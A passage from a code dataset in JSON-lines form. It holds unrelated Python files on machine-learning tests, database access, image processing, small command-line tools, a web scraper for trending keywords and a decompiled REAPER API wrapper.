weight_decay_rate=weight_decay,\n )\n var_list = []\n for i in range(train_iters):\n with tf.GradientTape() as tape:\n if i == 0:\n var0 = tf.identity(var)\n var_list.append(var0)\n random_mask = tf.Variable(random_masks_seq[i])\n loss = tf.reduce_mean(var + random_mask)\n gradients = tape.gradient(loss, var)\n opt.apply_gradients(zip([gradients], [var]))\n var_list.append(var.numpy())\n case = (\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n )\n test_case.assertTrue(len(x_list) == len(var_list))\n for (i, o, t) in zip(range(len(var_list)), x_list, var_list):\n diff = o - t\n test_case.assertTrue(\n np.allclose(x_list[i], var_list[i], rtol=0.001, atol=0.001), (i, case, diff)\n )\n diff = x.flatten() - var.numpy().flatten()\n test_case.assertTrue(\n np.allclose(x.flatten(), var.numpy().flatten(), rtol=0.001, atol=0.001),\n (case, diff),\n )\n\n\n@flow.unittest.skip_unless_1n1d()\nclass TestLamb(flow.unittest.TestCase):\n def test_lamb(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"test_case\"] = [test_case]\n arg_dict[\"device_type\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"x_shape\"] = [(10,)]\n arg_dict[\"beta1\"] = [0.9]\n arg_dict[\"beta2\"] = [0.999]\n arg_dict[\"epsilon\"] = [1e-06]\n arg_dict[\"weight_decay\"] = [0.01]\n arg_dict[\"learning_rate\"] = [0.0001]\n arg_dict[\"train_iters\"] = [10]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow_addons_lamb(*arg)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/oneflow/compatible/single_client/test/ops/test_lamb.py","file_name":"test_lamb.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"345757332","text":"import datetime\nfrom typing import Dict, Iterable, Mapping\n\nimport attr\n\nimport aiopg.sa\nfrom aiopg.sa.result import ResultProxy, RowProxy\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import Insert\nfrom sqlalchemy.sql.selectable import Select\nfrom sqlalchemy.sql import and_, not_\nfrom sqlalchemy.sql.schema import Column\n\nDEFAULT_PAGE_SIZE = 100\n\n\nclass BasePostgresClient:\n def __init__(\n self,\n usecase_class,\n engine: aiopg.sa.Engine,\n table: sa.Table,\n db_generated_fields: Iterable[str] = None,\n ):\n self.usecase_class = usecase_class\n self.engine = engine\n self.table = table\n self.db_generated_fields = db_generated_fields or [\"created_at\", \"updated_at\"]\n\n async def insert(self, usecase):\n serialized_usecase: Dict = self._serialize_for_db(usecase)\n async with self.engine.acquire() as conn:\n statement: Insert = (\n self.table.insert()\n .values(**serialized_usecase)\n .returning(*[column for column in self.table.columns])\n )\n results: ResultProxy = await conn.execute(statement)\n return await results.fetchone()\n\n async def select_first_where(\n self, include: Mapping = None, exclude: Mapping = None\n ):\n results = await self.select_where(include=include, exclude=exclude, page_size=1)\n if results:\n return results[0]\n return None\n\n async def select_where(\n self, include: Mapping = None, exclude: Mapping = None, page=0, page_size=None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n page_size = page_size if page_size else DEFAULT_PAGE_SIZE\n async with self.engine.acquire() as conn:\n statement: Select = self.table.select().where(where_clause)\n paginated_statement = self._paginate_query(statement, page, page_size)\n results: ResultProxy = await conn.execute(paginated_statement)\n return [await self._deserialize_from_db(result) async for result in results]\n\n async def update_where(\n self, set_values: Mapping, include: Mapping = None, exclude: Mapping = None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n async with self.engine.acquire() as conn:\n statement = self.table.update.where(where_clause)\n\n def _generate_where_clause(self, include: Mapping = None, exclude: Mapping = None):\n \"\"\"Turn inclusion/exclusion maps into SQLAlchemy `where` clause\"\"\"\n inclusion_ands = []\n exclusion_ands = []\n if include:\n for field, includes in include.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(includes):\n # Use SQL [column] IN [(values)]\n inclusion_ands.append(table_col.in_(includes))\n else:\n # Use SQL [column] = [value]\n inclusion_ands.append(table_col == includes)\n if exclude:\n for field, excludes in exclude.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(excludes):\n # Use SQL [column] NOT IN [(values)]\n exclusion_ands.append(not_(table_col.in_(excludes)))\n else:\n # Use SQL [column] != [value]\n exclusion_ands.append(table_col != excludes)\n return and_(*inclusion_ands, *exclusion_ands)\n\n def _generate_values_clause(self, set_values: Mapping):\n pass\n\n def _paginate_query(self, where_clause, page=0, page_size=None):\n if page_size:\n where_clause = where_clause.limit(page_size)\n if page:\n where_clause = where_clause.offset(page * page_size)\n return where_clause\n\n async def _deserialize_from_db(self, row: RowProxy):\n # returns attrs object if successful\n row_dict = dict(row)\n return self.usecase_class(**row_dict)\n\n def _serialize_for_db(self, usecase) -> Dict:\n # at this point we're assuming attrs objects for usecases\n usecase_dict: Dict = attr.asdict(usecase)\n for db_generated_field in self.db_generated_fields:\n if usecase_dict.get(db_generated_field) is None:\n # inserting a non-nullable field with value None will result in a\n # `psycopg2.IntegrityError: null value in column violates not-null constraint`\n # we delete the value from the dict instead\n del usecase_dict[db_generated_field]\n for k, v in usecase_dict.items():\n if isinstance(v, datetime.datetime):\n usecase_dict[k]: str = v.isoformat()\n return usecase_dict\n\n\ndef _isiterable(var) -> bool:\n return isinstance(var, Iterable) and not isinstance(var, str)\n","sub_path":"app/infrastructure/datastore/postgres/clients/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"23605552","text":"from scipy.misc.pilutil import imresize\n\n__author__ = 'peter'\n\n\ndef resize_while_preserving_aspect_ratio(im, x_dim=None, y_dim=None):\n \"\"\"\n Resize an image, while preserving the aspect ratio. For this you need to specify either x_dim or y_dim.\n\n :param im: The image: a 2D or 3D array.\n :param x_dim: An integer indicating the desired size, or None, to leave it loose.\n :param y_dim: An integer indicating the desired size, or None, to leave it loose.\n :return: A new image whose x_dim or y_dim matches the constraint\n \"\"\"\n assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n\n x_dim = float('inf') if x_dim is None else x_dim\n y_dim = float('inf') if y_dim is None else y_dim\n\n box_aspect_ratio = x_dim/float(y_dim)\n image_aspect_ratio = im.shape[1] / float(im.shape[0])\n if image_aspect_ratio > box_aspect_ratio: # Active constraint is width\n return imresize(im, size=(int(x_dim/image_aspect_ratio+.5), x_dim))\n else: # Active constraint is height\n return imresize(im, size=(y_dim, int(y_dim*image_aspect_ratio+.5)))\n\n\ndef equalize_image_dims(list_of_images, x_dim = None, y_dim = None):\n \"\"\"\n Resize images so that they match roughly in size although their aspect ratio will be preserved.\n :param list_of_images: A list of numpy arrays representing images (2D or 3D arrays)\n :param size: A 2-tuple specifying the desired (y_size, x_size).\n Each of (y_size, x_size) can be:\n - An integar, meaning that this axis of the image will remain equal or smaller than this number of pixels.\n - None, meaning that there is no constraint along this axis (e.g. (224, None) just states that the image will be\n scaled to 224 pixels in the vertical direction - the horizontal will be whatever size is needed to maintain\n the aspect ratio.\n - 'max': Meaning that we take the largest image size along this axis.\n - 'min': Meaning what we take the largest image size along this axis.\n\n The image will then be scaled so that the image size remains inside this box (although, unless the aspect ratio\n matches exactly, one dimension will be smaller).\n\n :return: Another list of images.\n \"\"\"\n assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n if len(list_of_images)==0:\n return []\n x_dim = max(im.shape[1] for im in list_of_images) if x_dim=='max' else \\\n min(im.shape[1] for im in list_of_images) if x_dim=='min' else \\\n x_dim\n y_dim = max(im.shape[0] for im in list_of_images) if y_dim=='max' else \\\n min(im.shape[0] for im in list_of_images) if y_dim=='min' else \\\n y_dim\n new_list_of_images = [resize_while_preserving_aspect_ratio(im, x_dim=x_dim, y_dim=y_dim) for im in list_of_images]\n return new_list_of_images\n","sub_path":"artemis/general/image_ops.py","file_name":"image_ops.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"514414843","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('coins.jpg')\nimg = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n\n# sure background area\nsure_bg = cv2.dilate(opening,kernel,iterations=3)\n\n# Finding sure foreground area\ndist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\nret, sure_fg = cv2.threshold(dist_transform,0.2*dist_transform.max(),255,0)\n\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv2.subtract(sure_bg,sure_fg)\n\n# Marker labelling\nret, markers = cv2.connectedComponents(sure_fg)\n\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n\n# Apply watershed\nmarkers = cv2.watershed(img,markers)\nresult = np.copy(img)\nresult[markers == -1] = [255,0,0]\n\nplt.subplot(2,3,1),plt.imshow(img)\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,2),plt.imshow(gray)\nplt.title('Greyscale'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,3),plt.imshow(dist_transform)\nplt.title('Distance Transform'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,4),plt.imshow(unknown)\nplt.title('Sure fg/bg regions marked purple'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,5),plt.imshow(markers)\nplt.title('Marker Image after Segmentation'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,6),plt.imshow(result)\nplt.title('Result'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n","sub_path":"watershed_segmentation.py","file_name":"watershed_segmentation.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"571255145","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\n\nimport command_add\nimport command_show\nimport command_update\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(help=\"subcommands\")\n\n parser.add_argument(\"-i\", \"--inventory\", default=\"data/inventory.db\", help=\"path to inventory database\")\n parser.add_argument(\"-m\", \"--market\", default=\"data/market.json\", help=\"path to market database\")\n\n parser_add = subparsers.add_parser(\"add\", help=\"add an item to inventory\")\n parser_add.set_defaults(command=command_add.run)\n parser_add.add_argument(\"item\", nargs=\"?\")\n parser_add.add_argument(\"count\", nargs=\"?\", default=1, type=int)\n\n parser_show = subparsers.add_parser(\"show\", help=\"show full inventory\")\n parser_show.set_defaults(command=command_show.run)\n parser_show.add_argument(\"-d\", \"--ducats\", action=\"store_true\", help=\"sort by ducats/price value\")\n parser_show.add_argument(\"-p\", \"--plats\", action=\"store_true\", help=\"sort by price\")\n\n parser_update = subparsers.add_parser(\"update\")\n parser_update.set_defaults(command=command_update.run)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n os.makedirs(\"data\", exist_ok=True)\n if \"command\" in args:\n args.command(args)\n else:\n parser.print_help()\n","sub_path":"wfih.py","file_name":"wfih.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"131886312","text":"import numpy as np\nimport pandas as pd\n#from matplotlib import pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport itertools as it\nimport random\n\nnames = ['State', 'City', 'Latitude', 'Longitude']\nData = pd.read_table('posit.txt', names=names)\n\ncity_to_index = {}\nfor i in xrange(50):\n city_to_index[Data['City'][i]] = i\n\nindex_to_city = {}\nfor key in city_to_index:\n index_to_city[city_to_index[key]] = key\n\ndef distance(city1, city2):\n lat1 = Data['Latitude'][city_to_index[city1]]*np.pi/180.\n lat2 = Data['Latitude'][city_to_index[city2]]*np.pi/180.\n lon1 = Data['Longitude'][city_to_index[city1]]*np.pi/180.\n lon2 = Data['Longitude'][city_to_index[city2]]*np.pi/180.\n dlon = np.abs(lon2 - lon1)\n dlat = np.abs(lat2 - lat1)\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(min(1,np.sqrt(a)))\n return c * 6373 # km this value includes some elipticity of the earth\n # and is optimizes for ~39 lat Haversine Formula\n\ndef trip_length(list_of_cities):\n length = 0\n for i in range(len(list_of_cities)-1):\n city1 = list_of_cities[i]\n city2 = list_of_cities[i+1]\n length += distance(city1, city2)\n return length\n\ndef brute_force(start_city, other_cities):\n trips = []\n for perm in list(it.permutations(other_cities)):\n trips.append([start_city]+[x for x in perm]+[start_city])\n for trip in trips:\n trips.remove(trip[::-1])\n distances = np.zeros(len(trips))\n for i in xrange(len(distances)):\n distances[i] = trip_length(trips[i])\n index = np.argsort(distances)\n ordered_distance = distances[index]\n ordered_trips = []\n for value in index:\n ordered_trips.append(trips[value])\n return ordered_distance, ordered_trips\n\ncapitals = list(Data['City'].drop([city_to_index['Juneau'],\n city_to_index['Honolulu']]).values)\nrandom_11 = []\nfor i in range(11):\n random_11.append(random.choice(capitals))\n capitals.remove(random_11[-1])\n\nordered_distance, ordered_trips = brute_force(random_11[0],\n random_11[1:])\n# why do you have to assign this\n\nnp.savez('11_city_brute_force.npz', ordered_distance=ordered_distance,\n ordered_trips=ordered_trips)\n","sub_path":"traveling_sales.py","file_name":"traveling_sales.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"484648432","text":"\nfrom flask import Flask, redirect\nfrom flask import url_for\nimport os\napp = Flask(__name__, static_folder=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test')\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\nfp=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test'\n\nclass overallData:\n counter = 0\n\ndataHold = overallData()\n\n@app.route('/')\ndef displayImg():\n dataHold.counter += 1\n for counter,file in enumerate(os.listdir(fp)):\n if counter+1 == dataHold.counter:\n try:\n print(file)\n img_url = url_for('static',filename=file)\n return redirect(img_url)\n except:\n return '

    Sad

    '\n return '

    Sorry

    '\n\nif __name__ == '__main__':\n app.run(port=8080,debug=True)\n","sub_path":"PicDisp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"584236581","text":"import os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nmodule_version = \"0.1.5\"\n\nsetup(\n name=\"DailyLogger\",\n packages=[\"DailyLogger\"],\n version=module_version,\n license=\"MIT\",\n description=\"A basic daily logger to log python projects.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Samyak Ratna Tamrakar\",\n author_email=\"samyak.r.tamrakar@gmail.com\",\n url=\"https://github.com/srtamrakar/python-logger\",\n download_url=f\"https://github.com/srtamrakar/python-logger/archive/v_{module_version}.tar.gz\",\n keywords=[\"log\", \"logger\", \"logging\"],\n install_requires=[\"multiprocessing_logging==0.3.0\"],\n classifiers=[\n \"Development Status :: 4 - Beta\", # Either\"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\"\n \"Intended Audience :: Developers\", # Define that your audience are developers\n \"Topic :: Software Development :: Build Tools\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n)\n","sub_path":"pypi_install_script/DailyLogger-0.1.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"19398679","text":"# predict.py\n#\n# Command line tool to predict the class of an image using a pretrained\n# pytorch network\n#\n# Author: Taylor Weiss\n# Class: Udacity - AI Programming with Python Nanodegree Program\n# Project: Image Classifier\n\n\nimport argparse\nimport data\nimport network\nimport json\nimport os.path\n\n\n# Define command line arguments\nparser = argparse.ArgumentParser(\n description='use a checkpoint to predict the name of an image'\n)\n\nparser.add_argument(\n 'input',\n action='store',\n help='path to the image file'\n)\nparser.add_argument(\n 'checkpoint',\n action='store',\n help='path to the checkpoint file'\n)\nparser.add_argument(\n '--top_k',\n action='store',\n help='number of likely classes to return',\n type=int,\n default=5\n)\nparser.add_argument(\n '--category_names',\n action='store',\n help='path to a json mapping of category labels to names'\n)\nparser.add_argument(\n '--gpu',\n action='store_true',\n help='use the gpu for prediction',\n default=False\n)\n\nargs = parser.parse_args()\n\n# validate and convert the image file\nimage_filename = args.input\nif not os.path.isfile(image_filename):\n print('Unable to find image file', image_filename)\n exit()\n\n# BUGBUG: useful for testing, but probably don't want to assume the\n# image is from the image dataset\nimage_category = image_filename.split(os.sep)[-2]\n\nimage_data = data.process_image(args.input)\n\n# create the network\ndevice = 'cuda' if args.gpu else 'cpu'\nmodel = network.load_network(args.checkpoint, device)\n\n# predict\nprobs, classes = network.predict(image_data, model, device, topk=args.top_k)\n\n# Load the category to name mapping if provided\ncat_to_name = None\nif args.category_names and os.path.isfile(args.category_names):\n with open(args.category_names, 'r') as f:\n cat_to_name = json.load(f)\n\n# output results\nprint('Image category:', image_category)\nif cat_to_name:\n print('Image name:', cat_to_name[image_category])\nprint('Probabilities:', probs)\nprint('Classes:', classes)\nif cat_to_name:\n names = [cat_to_name[cat] for cat in classes]\n print('Names:', names)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"597123587","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\nThe following script performs the necessary NLP enrichment on the documents.\n\nExamples\n--------\n\n.. code-block:: bash\n\n python document_enrichment --cores 2 --fields title abstract --inputs \\\nsample_dataset/patent.sample* --output .\n\n\"\"\"\n\nimport os\nimport argparse\nimport multiprocessing as mp\n\nfrom spacy_enrichment.spacy_enrichment import enrich_documents\n\n\ndef run_enricher(args):\n \"\"\"\n\n Perform enrichment on multiple document files in parallel.\n\n Parameters\n ----------\n args : dict\n Arguments.\n\n \"\"\"\n\n if args.cores == 1:\n for ipath in args.inputs:\n enrich_documents(ipath, args)\n else:\n pool = mp.Pool(args.cores)\n for ipath in args.inputs:\n res = pool.apply_async(enrich_documents, args=(ipath, args, ))\n pool.close()\n pool.join()\n if not res.successful():\n print(res.get())\n\n\ndef files_path_validation(paths):\n \"\"\" Validation of a list of file paths.\n\n Parameters\n ----------\n paths : list\n A list of paths to files.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n\n \"\"\"\n\n for path in paths:\n if not os.path.exists(path):\n raise FileNotFoundError('File {0} is not there.'.format(path))\n\n\ndef dir_path_validation(path, create_dir=False):\n \"\"\"Directory path validation.\n\n Parameters\n ----------\n path : str\n /path/to/a/directory/.\n create_dir : bool\n If True, a new directory will be made once it doesn't exist.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n NotADirectoryError\n Raised if ``path`` is not a directory.\n\n \"\"\"\n\n if not os.path.exists(path):\n if create_dir:\n os.makedirs(path)\n else:\n raise FileNotFoundError('Directory {0} is not there.'.format(path))\n elif not os.path.isdir(path):\n raise NotADirectoryError('{0} is not a directory.'.format(path))\n\n\nif __name__ == \"__main__\":\n pparser = argparse.ArgumentParser()\n pparser.add_argument('--fields', nargs='+', type=str,\n help='Content fields to enrich.')\n pparser.add_argument('--cores', type=int, default=2,\n help='How many cores to use?')\n pparser.add_argument('--noun-chunk', action='store_true',\n help='generate noun chunks')\n pparser.add_argument('--sents', action='store_true',\n help='split to sentences')\n pparser.add_argument('--svo', action='store_true',\n help='generate svo')\n pparser.add_argument('--entity', action='store_true',\n help='generate entities')\n pparser.add_argument('--inputs', nargs='+', required=True,\n help='Path to input documents')\n pparser.add_argument('--output', required=True, help='Path to output dir.')\n pparser.add_argument('--chunk-size', type=int, default=128,\n help='# of documents to handle at once')\n args = pparser.parse_args()\n files_path_validation(args.inputs)\n dir_path_validation(args.output, create_dir=True)\n run_enricher(args)\n","sub_path":"document_enrichment.py","file_name":"document_enrichment.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"328824468","text":"import requests\nimport json\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nimport threading\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef jsonload() :\n req = requests.get('https://www.naver.com/')\n html = req.text\n soup = BeautifulSoup(html, 'html.parser')\n mysearch = soup.select(\n '.PM_CL_realtimeKeyword_rolling_base > div > ul > li > a > .ah_k'\n )\n data = json.load(open(os.path.join(BASE_DIR, 'result.json'), mode='r+', encoding='utf8'))\n nowstring = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n data[nowstring] = []\n for title in mysearch:\n data[nowstring].append(title.text)\n with open(os.path.join(BASE_DIR, 'result.json'), mode='w+', encoding='utf8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=\"\\t\")\n\ndef main():\n jsonload()\n threading.Timer(10, main).start()\n\nmain()","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"443538280","text":"\"\"\" Kuwin Wyke\nMidwestern State University\nStart: 1 November 2019\nEnd: Work in progress\n\nThis module is designed to be used in the ball recognition program in the\nfolder named \"ball_recognition_v1\". It possess most of the variables to be\nused within the program including dictionaries with all valid motions in\nheart2heart.\n\nALL debug related variables and functions can be found in debug.py\n\"\"\"\n\n# Used for testing purposes. This activates the test environment in the event\n# the robot is not available or there is risky code to be tested\nimport numpy as np\n\n\nclass RobotCom:\n # Used to activate and deactivate automatic movement of the robot\n automatic_control = 1\n\n\n# Filter specific variables **************************************************\nclass FilterVariables:\n _inst = None\n\n @staticmethod\n def get_inst():\n if FilterVariables._inst is None:\n FilterVariables._inst = FilterVariables()\n return FilterVariables._inst\n\n def __init__(self):\n # Set path to variables file\n self._file = \"filter_variables.txt\"\n # Read variables from file\n with open(self._file, \"r\") as file:\n self.lower_limit = int(file.readline())\n self.lower_limit2 = int(file.readline())\n self.lower_limit_hue = int(file.readline())\n self.upper_limit = int(file.readline())\n self.upper_limit2 = int(file.readline())\n self.upper_limit_hue = int(file.readline())\n self.circle_detect_param = int(file.readline())\n self.circle_detect_param2 = int(file.readline())\n\n # Create arrays for filter parameters\n self.lower_range = np.array(\n [\n self.lower_limit_hue,\n self.lower_limit,\n self.lower_limit2\n ]\n )\n self.upper_range = np.array(\n [\n self.upper_limit_hue,\n self.upper_limit,\n self.upper_limit2\n ]\n )\n\n def file_save(self):\n print(\"saving filter variables file\")\n string = str(self.lower_limit) + '\\n'\n string += str(self.lower_limit2) + '\\n'\n string += str(self.lower_limit_hue) + '\\n'\n string += str(self.upper_limit) + '\\n'\n string += str(self.upper_limit2) + '\\n'\n string += str(self.upper_limit_hue) + '\\n'\n string += str(self.circle_detect_param) + '\\n'\n string += str(self.circle_detect_param2)\n with open(self._file, \"w\") as file:\n file.write(string)\n\n def get_ranges(self):\n ary = [\n self.lower_range,\n self.upper_range\n ]\n return ary\n\n def get_circle_params(self):\n ary = [\n self.circle_detect_param,\n self.circle_detect_param2\n ]\n return ary\n\n def get_lower(self):\n ary = [\n self.lower_limit,\n self.lower_limit2,\n self.lower_limit_hue,\n ]\n return ary\n\n def get_upper(self):\n ary = [\n self.upper_limit,\n self.upper_limit2,\n self.upper_limit_hue,\n ]\n return ary\n\n def update_ranges(self):\n # Create arrays for filter parameters\n self.lower_range = np.array(\n [\n self.lower_limit_hue,\n self.lower_limit,\n self.lower_limit2\n ]\n )\n self.upper_range = np.array(\n [\n self.upper_limit_hue,\n self.upper_limit,\n self.upper_limit2\n ]\n )\n\n def update_lower_limit(self, value):\n self.lower_limit = value\n\n def update_lower_limit2(self, value):\n self.lower_limit2 = value\n\n def update_lower_limit_hue(self, value):\n self.lower_limit_hue = value\n\n def update_upper_limit(self, value):\n self.upper_limit = value\n\n def update_upper_limit2(self, value):\n self.upper_limit2 = value\n\n def update_upper_limit_hue(self, value):\n self.upper_limit_hue = value\n\n def update_circle_detect_param(self, value):\n self.circle_detect_param = value\n\n def update_circle_detect_param2(self, value):\n self.circle_detect_param2 = value\n\n\nclass ExitControl:\n # General exit flag\n gen = 0\n remote = 0\n # Exit flag for ball detection\n detection = 0\n # Exit flag for calibration loop\n calibrate = 0\n","sub_path":"Old Files/Generation V2/ball_recognition/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"396246596","text":"def distance(strand_a, strand_b): \n length_of_a=len(strand_a) \n length_of_b=len(strand_b) \n if length_of_a == length_of_b:\n n = 0 \n distance=0 \n while n < length_of_a: \n if strand_a[n]==strand_b[n]: \n distance+=0 \n n+=1\n else: \n distance+=1 \n n+=1 \n return distance \n else:\n raise ValueError ('Make sure both the length of strings are equal')\n\n#########################################################################################################################################\n#Introduction\n#\n#Calculate the Hamming Distance between two DNA strands.\n#\n#Your body is made up of cells that contain DNA. Those cells regularly wear out and need replacing, which they achieve by dividing into #daughter cells. In fact, the average human body experiences about 10 quadrillion cell divisions in a lifetime!\n#\n#When cells divide, their DNA replicates too. Sometimes during this process mistakes happen and single pieces of DNA get encoded with the #incorrect information. If we compare two strands of DNA and count the differences between them we can see how many mistakes occurred. This #is known as the \"Hamming Distance\".\n#\n#We read DNA using the letters C,A,G and T. Two strands might look like this:\n#\n#GAGCCTACTAACGGGAT\n#CATCGTAATGACGGCCT\n#^ ^ ^ ^ ^ ^^\n#\n#They have 7 differences, and therefore the Hamming Distance is 7.\n#\n#The Hamming Distance is useful for lots of things in science, not just biology, so it's a nice phrase to be familiar with :)\n#Implementation notes\n#\n#The Hamming distance is only defined for sequences of equal length, so an attempt to calculate it between sequences of different lengths #should not work. The general handling of this situation (e.g., raising an exception vs returning a special value) may differ between #languages.\n####################################################################################################################################\n","sub_path":"hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"651926755","text":"budgets = []\nanswer = []\nn = int(input())\nc = int(input())\nfor i in range(n):\n b = int(input())\n budgets.append(b)\nbudgets.sort()\nwhile len(budgets)!=0:\n mean_price = c/len(budgets)\n if budgets[0] >= mean_price:\n answer.append(round(mean_price))\n c -= round(mean_price)\n del budgets[0]\n else:\n answer.append(budgets[0])\n c -= budgets[0]\n del budgets[0]\nif c>0:\n print(\"IMPOSSIBLE\")\nelse:\n answer.sort()\n for i in answer:\n print(i)\n","sub_path":"Nice code/codingame/The Gift.py","file_name":"The Gift.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"275641266","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\despres\\Desktop\\reaper\\scripts\\reapy\\reapy\\additional_api.py\n# Compiled at: 2020-04-18 05:35:37\n# Size of source mod 2**32: 16652 bytes\nimport ctypes as ct\nfrom reapy import reascript_api as RPR\nfrom reapy.reascript_api import _RPR\n\ndef packs_l(v: str, encoding='latin-1') -> ct.c_char_p:\n MAX_STRBUF = 4194304\n return ct.create_string_buffer(str(v).encode(encoding), MAX_STRBUF)\n\n\ndef unpacks_l(v):\n return str(v.value.decode('latin-1'))\n\n\ndef MIDI_GetEvt(take, evtidx, selectedOut, mutedOut, ppqposOut, msg, msg_sz):\n a = _RPR._ft['MIDI_GetEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_int, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_char_p, ct.c_void_p)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', take), ct.c_int(evtidx),\n ct.c_byte(selectedOut), ct.c_byte(mutedOut), ct.c_double(ppqposOut),\n packs_l(msg), ct.c_int(msg_sz))\n r = f(t[0], t[1], ct.byref(t[2]), ct.byref(t[3]), ct.byref(t[4]), t[5], ct.byref(t[6]))\n return (\n r, take, evtidx, int(t[2].value), int(t[3].value), float(t[4].value),\n unpacks_l(t[5]), int(t[6].value))\n\n\ndef MIDI_GetHash(p0, p1, p2, p3):\n a = _RPR._ft['MIDI_GetHash']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_char_p, ct.c_int)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', p0), ct.c_byte(p1), packs_l(p2), ct.c_int(p3))\n r = f(t[0], t[1], t[2], 